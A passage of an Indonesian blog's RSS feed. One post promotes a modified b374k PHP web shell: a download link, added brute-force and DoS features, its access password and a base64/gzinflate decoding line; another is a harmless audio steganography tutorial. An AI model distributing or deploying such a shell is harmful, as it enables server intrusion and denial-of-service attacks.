			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p>nih scriptnya copas ke notepad terus save dengan file tipe php <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  (*yg udah tau pasti <img title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" />)<br />
<a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS,<br />
dan pengunaan password untuk mengakses shell tersebut <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> <span id="more-225"></span><br />
<!--more--><br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1178.snc4/155064_176829012341444_100000430395530_496956_7868734_n.jpg" border="0" alt="[Image: 155064_176829012341444_100000430395530_4...8734_n.jpg]" width="632px" /></p>
<p>passwordnya = devilzc0de</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" width="632px" /></p>
<p>atau bisa ubah sendiri password hashnya dalam bentuk md5 <img title="mantap" src="http://devilzc0de.org/forum/images/smilies/top.gif" border="0" alt="mantap" /></p>
<h1><span style="color: #ff0000;"> UPGRADE SCRIPT</span></h1>
<p><a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ditambahkan DOS attack</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1373.snc4/164525_188139351210410_100000430395530_569776_2031231_n.jpg" border="0" alt="[Image: 164525_188139351210410_100000430395530_5...1231_n.jpg]" width="632px" /></p>
<h2><span style="color: #ff0000;">NB Script di encode biar ukurannya jadi lebih kecil aja</span></h2>
<p>kalo mau decode bisa make script php ini :</p>
<blockquote><p>gzinflate(base64_decode($scripygdiencode))</p></blockquote>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/ngedit-script-b374k/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;n=Ngedit+Script+b374k&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/ngedit-script-b374k/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k&amp;desc=nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;t=Ngedit+Script+b374k" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Ngedit+Script+b374k&amp;body=Link: http://www.james0baster.web.id/v2/ngedit-script-b374k/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k&amp;srcUrl=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;srcTitle=Ngedit+Script+b374k&amp;snippet=nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;t=Ngedit+Script+b374k" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Ngedit+Script+b374k&amp;body=Link: http://www.james0baster.web.id/v2/ngedit-script-b374k/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Ngedit%20Script%20b374k%22&amp;body=Link: http://www.james0baster.web.id/v2/ngedit-script-b374k/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;bm_description=Ngedit+Script+b374k&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;t=Ngedit+Script+b374k" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Ngedit+Script+b374k+-+http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;title=Ngedit+Script+b374k" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/ngedit-script-b374k/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Ngedit+Script+b374k+-+http://bit.ly/eTDaky&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/ngedit-script-b374k/&amp;submitHeadline=Ngedit+Script+b374k&amp;submitSummary=nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Ngedit+Script+b374k&amp;body=Link: http://www.james0baster.web.id/v2/ngedit-script-b374k/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A nih%20scriptnya%20copas%20ke%20notepad%20terus%20save%20dengan%20file%20tipe%20php%20%3AD%20%28%2Ayg%20udah%20tau%20pasti%20%29%0D%0Ahttp%3A%2F%2Fxjamesx.tk%2F404.txt%0D%0A%0D%0Angedit%20b374k%20biar%204%20in%201%2C%20ga%20perlu%20banyak3%20upload%20cukup%201%20file%20sudah%20mematikan%2C%20fitur%20yg%20ditambahkan%20%3D%20bruteforce%2C%20readable%2C%20DOS%2C%0D%0Adan%20pengunaan%20password%20untuk%20mengakses%20shell%20terseb" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/ngedit-script-b374k/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/ngedit-script-b374k/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Steganografi Audio</title>
		<link>http://www.james0baster.web.id/v2/steganografi-audio/</link>
		<comments>http://www.james0baster.web.id/v2/steganografi-audio/#comments</comments>
		<pubDate>Sun, 12 Dec 2010 17:59:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[ICT]]></category>
		<category><![CDATA[Keamanan]]></category>
		<category><![CDATA[Komputer]]></category>
		<category><![CDATA[Tips and Trick]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=194</guid>
		<description><![CDATA[<p><strong><a href="http://4.bp.blogspot.com/_-61VO3NSl7w/TLkRnFEIp3I/AAAAAAAAABE/q5vAd7FHQqA/s1600/workshop-code.jpg"><img class="alignleft size-full wp-image-195" title="201004142215532525" src="http://4.bp.blogspot.com/_-61VO3NSl7w/TLkRnFEIp3I/AAAAAAAAABE/q5vAd7FHQqA/s1600/workshop-code.jpg" alt="" width="300" height="222" /></a>Steganografi</strong> adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia.</p>
<p>Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks, audio atau gambar) di dalam berkas-berkas lain yang mengandung teks, image, bahkan audio tanpa menunjukkan ciri-ciri perubahan yang nyata atau terlihat dalam kualitas dan struktur dari berkas semula. Metode ini termasuk tinta yang tidak tampak, microdots, pengaturan kata, tanda tangan digital, jalur tersembunyi dan komunikasi spektrum lebar.</p>
<p>Tujuan dari steganografi adalah merahasiakan atau menyembunyikan keberadaan dari sebuah pesan tersembunyi atau sebuah informasi. Dalam prakteknya, kebanyakan pesan disembunyikan dengan membuat perubahan tipis terhadap data digital lain yang isinya tidak akan menarik perhatian dari penyerang</p>
<p style="text-align: center;"><strong>Proses Steganografi Audio Mengunakan Sound Forge</strong></p>
<p><span id="more-194"></span><strong>A. Tahap Pertama</strong></p>
<p>1. Menyiapkan File Suara carrier (pembawa pesan)</p>
<p>2. Hapus suara pada Channel kedua File Suara carrier seperti gambar dibawah ini :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/1.jpg"><img class="size-full wp-image-196 aligncenter" title="1" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/1.jpg" alt="" width="100%" /></a></p>
<p>3. Dengan cara dabel klik channel kedua dan tekan tombol delete pada keybord</p>
<p><strong>B. Tahap Kedua</strong></p>
<ol>
<li>Menyiapkan File Suara Pesan (yang akan di sembunyikan)</li>
<li>Mengcopy channel pertama pada Suara pesan dan ditaruh ke Channel kedua Suara Carrier seperti gambar dibawah :</li>
</ol>
<p><img class="aligncenter size-full wp-image-201" title="2" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/2.jpg" alt="" width="100%" /></p>
<p><strong>Melakukan Peningkatan Oktaf Pada Suara Pesan</strong></p>
<ol>
<li>Memblok bagian channel Suara pesan dengan cara dabel klik</li>
<li>Klik menu Effects =&gt; Pitch =&gt; Shift , seperti gambar dibawah :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/3.jpg"><img class="aligncenter size-full wp-image-202" title="3" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/3.jpg" alt="" width="100%" /></a></p>
<p>3. Ubah Sametones to shift pitch by menjadi 20 seperti digambar berikut</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/4.jpg"><img class="aligncenter size-full wp-image-203" title="4" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/4.jpg" alt="" width="370" height="339" /></a></p>
<p>Yang mengakibatkan suara pesan dari 43 detik menjadi 13 detik</p>
<p><strong>C. Tahap Ketiga</strong></p>
<ol>
<li><strong></strong>Melakukan Pemotongan dan penyebaran Suara pesan.</li>
<li>Memblok dan Mengcutnya, seperti gambar di bawah ini :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/5.jpg"><img class="aligncenter size-full wp-image-204" title="5" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/5.jpg" alt="" width="415" height="388" /></a></p>
<p>3. Susun dengan bantuan 1. Even Tool hinga menjadi seperti gambar dibawah ini :</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/7.jpg"><img class="aligncenter size-full wp-image-209" title="7" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/7.jpg" alt="" width="100%" /></a></p>
<p><strong>D. Tahap Ke Empat</strong></p>
<ol>
<li>Mengubah Volume Suara pada Channel Suara Pesan.</li>
<li>Blok channel suara pesan dengan dabel klik pada channel suara pesan</li>
<li>Klik menu Process =&gt; Volume, seperti gambar dibawah ini :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/8.jpg"><img class="aligncenter size-full wp-image-206" title="8" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/8.jpg" alt="" width="100%" /></a>4. Ubah volume suara pesan menjadi 5% dari suara aslinya</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/9.jpg"><img class="aligncenter size-full wp-image-207" title="9" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/9.jpg" alt="" width="441" height="333" /></a></p>
<p style="text-align: center;"><strong>Prosses Steganografi Selesai</strong></p>
<p>Suara pesan akan tersamarkan oleh suara carrier dengan tampilan gelombang suara seperti gambar berikut :</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/10.jpg"><img class="aligncenter size-full wp-image-208" title="10" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/10.jpg" alt="" width="100%" /></a></p>
<p>Dan Hasil Suaranya Sebagai Berikut :</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="275" height="310" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://0james0.tk/JamesAmp.swf" /><param name="wmode" value="transparent" /><embed type="application/x-shockwave-flash" width="275" height="310" src="http://0james0.tk/JamesAmp.swf" wmode="transparent"></embed></object></p>
<p style="text-align: center;"><strong>Proses Decript</strong></p>
<p>Agar Pesan dapat didengar oleh si penerima pesan maka sipenerima pesan melakukan decript terlebih dahulu agar dapat mendengarkan pesan rahasia yang tersimpan pada suara carrier</p>
<p>Caranya dengan :</p>
<ol>
<li>Mendelete Channel Suara carrier</li>
<li>Mengembalikan Ukuran Volume Suara</li>
<li>Mengabungkan potongan-potongan pesan dengan Event Tool</li>
<li>Mengembalikan oktaf suara pesan</li>
</ol>
<p style="text-align: center;"><strong>Proses Steganografi Audio Mengunakan S-Tool</strong></p>
<p style="text-align: center;">
<p style="text-align: left;">1. Bukalah Program <strong>S-Tools</strong> yang telah sediakan    dalam dengan <strong>Mendouble Clik icon S-tools.exe</strong></p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg"><img class="aligncenter size-full wp-image-212" title="1" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg" alt="" width="410" height="286" /></a></p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg"></a>2. Setelah itu anda akan melihat tampilan awal seperti ini.</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/21.jpg"><img class="aligncenter size-full wp-image-213" title="2" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/21.jpg" alt="" width="458" height="300" /></a></p>
<p>3. Lalu, Setelah itu Drag lah File yang anda inginkan kedalam bidang kosong S-Tools sebagai media penyembunyian (<em>carrier audio</em>). Dalam hal ini penulis akan mendrag Sebuah File Wav dengan nama<strong> </strong><strong>Indonesia Jaya.wav.</strong></p>
<p><strong><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/31.jpg"><img class="aligncenter size-full wp-image-214" title="3" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/31.jpg" alt="" width="466" height="326" /></a><br />
</strong></p>
<p><strong><span style="font-weight: normal;">4. Akan tampil jendela Hiding. Isikan pada kotak <strong>PASSPHRASE</strong> sandi rahasia yang anda inginkan. Dalam hal ini akan mengisikannya dengan karakter “<strong>suhada</strong>”.</span></strong></p>
<p><strong><span style="font-weight: normal;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/41.jpg"><img class="aligncenter size-full wp-image-215" title="4" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/41.jpg" alt="" width="559" height="226" /></a><br />
</span></strong></p>
<p>5. Pada kotak <strong>VERIFY PASSPHRASE. </strong>Isikan juga sandi yang sama.</p>
<p>6. Kemudian Pilihlah jenis Algoritma pada kotak <strong>Encryption Algorithm</strong>. Dalam hal ini penulis menggunakan <strong>IDEA</strong>.<br />
7. Klik ok untuk memulai proses <em>Steganografi</em>.<br />
8. Proses Steganografi akan berlangsung. Selama Proses, jendela Action akan menunjukan kemajuan prosesnya. Perhatikan Bagian <strong>Progess</strong>.</p>
<p>9. Setelah proses berakhir, akan tampil jendela baru yang bernama “<strong>hidden data</strong>”</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/51.jpg"><img class="aligncenter size-full wp-image-216" title="5" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/51.jpg" alt="" width="470" height="386" /></a></p>
<p>10. Untuk menyimpannya, klik kanan pada bidang “<strong>hidden data</strong>” dan pilih menu <strong>Save As.</strong></p>
<p><strong><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/61.jpg"><img class="aligncenter size-full wp-image-217" title="6" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/61.jpg" alt="" width="459" height="380" /></a><br />
</strong></p>
<p>11. Pada kotak Save As yang tampil, beri nama file yang baru pada kotak <strong>File Name. </strong>pada hal ini penulis memberikan namanya dengan <strong>Result.WAV</strong>.</p>
<p>12. Klik tombol <strong>Save</strong>.</p>
<p>13. File carrier dan file hidden harus memiliki ukuran yang sama, seperti pada gambar dibawah ini akan ditujukan ukuran file tersebut.</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/71.jpg"><img class="aligncenter size-full wp-image-218" title="7" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/71.jpg" alt="" width="484" height="222" /></a></p>
<p>14. Untuk me-<em>reveal</em> sama dengan proses <em>embedding</em>, buka jendela result klik kanan klik <em>reveal</em>. Isi password yang sama dengan saat <em>embedding</em> Seperti pada gambar dibawah ini:</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/81.jpg"><img class="aligncenter size-full wp-image-219" title="8" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/81.jpg" alt="" width="465" height="348" /></a></p>
<p>15. Maka akan muncul file audio yang akan telah di steganografi, seperti pada gambar dibawah ini:</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/91.jpg"><img class="aligncenter size-full wp-image-220" title="9" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/91.jpg" alt="" width="225" height="158" /></a></p>
<p>16. Dan save file <em>carrier</em> dengan nama yang sama yaitu IndonesiaJaya.WAV</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/101.jpg"><img class="aligncenter size-full wp-image-221" title="10" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/101.jpg" alt="" width="438" height="273" /></a></p>
<p>17. Setelah melakukan proses reveal maka file audio yang sudah di strganografi tidak akan ditemukan lagi</p>
<p style="text-align: center;">
<p style="text-align: center;">Isi Pesan:</p>
<p style="text-align: center;">Ni hao?</p>
<p style="text-align: center;">Wo tu hen hao, ni jiao Moch Suhada</p>
<p style="text-align: center;">====================================</p>
<p style="text-align: center;">Shìshàng zhiyou mama hao</p>
<p style="text-align: center;">
<p style="text-align: center;">Di dunia ini, Ibu yang terbaik</p>
<p style="text-align: center;">
<p style="text-align: center;">Dinyanyikan oleh : Kevin</p>
<p style="text-align: center;">
<p style="text-align: center;">Shìshàng zhiyou mama hao</p>
<p style="text-align: center;">
<p style="text-align: center;">Di dunia ini hanya ibu yang terbaik</p>
<p style="text-align: center;">
<p style="text-align: center;">You ma de háizi xiàng gè bao</p>
<p style="text-align: center;">
<p style="text-align: center;">Anak yang memiliki ibu bagaikan harta</p>
<p style="text-align: center;">
<p style="text-align: center;">Tóu jìn mama de huáibào</p>
<p style="text-align: center;">
<p style="text-align: center;">Berada dalam pelukan ibu</p>
<p style="text-align: center;">
<p style="text-align: center;">Xìngfú xiang bùliao</p>
<p style="text-align: center;">=======================================</p>
<p style="text-align: center;">Dào xiang – zhou Jiélún</p>
<p style="text-align: center;">
<p style="text-align: center;">Wangi Padi – Jay Zhou</p>
<p style="text-align: center;">
<p style="text-align: center;">dui zhe ge shi jie, ruo guo ni you tai duo de bao yuan</p>
<p style="text-align: center;">
<p style="text-align: center;">jika kau terlalu banyak mengeluhkan dunia ini</p>
<p style="text-align: center;">
<p style="text-align: center;">die dao le, jiu bu gan ji xu wang qian zou</p>
<p style="text-align: center;">
<p style="text-align: center;">saat terjatuh kau tak berani kembali melangkah</p>
<p style="text-align: center;">
<p style="text-align: center;">wei shen me, ren yao zhe me de cui ruo, duo luo</p>
<p style="text-align: center;">
<p style="text-align: center;">mengapa manusia begitu lemah ?</p>
<p style="text-align: center;">
<p style="text-align: center;">qing ni da kai dian shi kan kan</p>
<p style="text-align: center;">
<p style="text-align: center;">coba kau lihat di televisi</p>
<p style="text-align: center;">xie-xie</p>
<p style="text-align: center;">terima kasih</p>
<p style="text-align: center;">
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/steganografi-audio/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p><strong><a href="http://4.bp.blogspot.com/_-61VO3NSl7w/TLkRnFEIp3I/AAAAAAAAABE/q5vAd7FHQqA/s1600/workshop-code.jpg"><img class="alignleft size-full wp-image-195" title="201004142215532525" src="http://4.bp.blogspot.com/_-61VO3NSl7w/TLkRnFEIp3I/AAAAAAAAABE/q5vAd7FHQqA/s1600/workshop-code.jpg" alt="" width="300" height="222" /></a>Steganografi</strong> adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia.</p>
<p>Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks, audio atau gambar) di dalam berkas-berkas lain yang mengandung teks, image, bahkan audio tanpa menunjukkan ciri-ciri perubahan yang nyata atau terlihat dalam kualitas dan struktur dari berkas semula. Metode ini termasuk tinta yang tidak tampak, microdots, pengaturan kata, tanda tangan digital, jalur tersembunyi dan komunikasi spektrum lebar.</p>
<p>Tujuan dari steganografi adalah merahasiakan atau menyembunyikan keberadaan dari sebuah pesan tersembunyi atau sebuah informasi. Dalam prakteknya, kebanyakan pesan disembunyikan dengan membuat perubahan tipis terhadap data digital lain yang isinya tidak akan menarik perhatian dari penyerang</p>
<p style="text-align: center;"><strong>Proses Steganografi Audio Mengunakan Sound Forge</strong></p>
<p><span id="more-194"></span><strong>A. Tahap Pertama</strong></p>
<p>1. Menyiapkan File Suara carrier (pembawa pesan)</p>
<p>2. Hapus suara pada Channel kedua File Suara carrier seperti gambar dibawah ini :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/1.jpg"><img class="size-full wp-image-196 aligncenter" title="1" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/1.jpg" alt="" width="100%" /></a></p>
<p>3. Dengan cara dabel klik channel kedua dan tekan tombol delete pada keybord</p>
<p><strong>B. Tahap Kedua</strong></p>
<ol>
<li>Menyiapkan File Suara Pesan (yang akan di sembunyikan)</li>
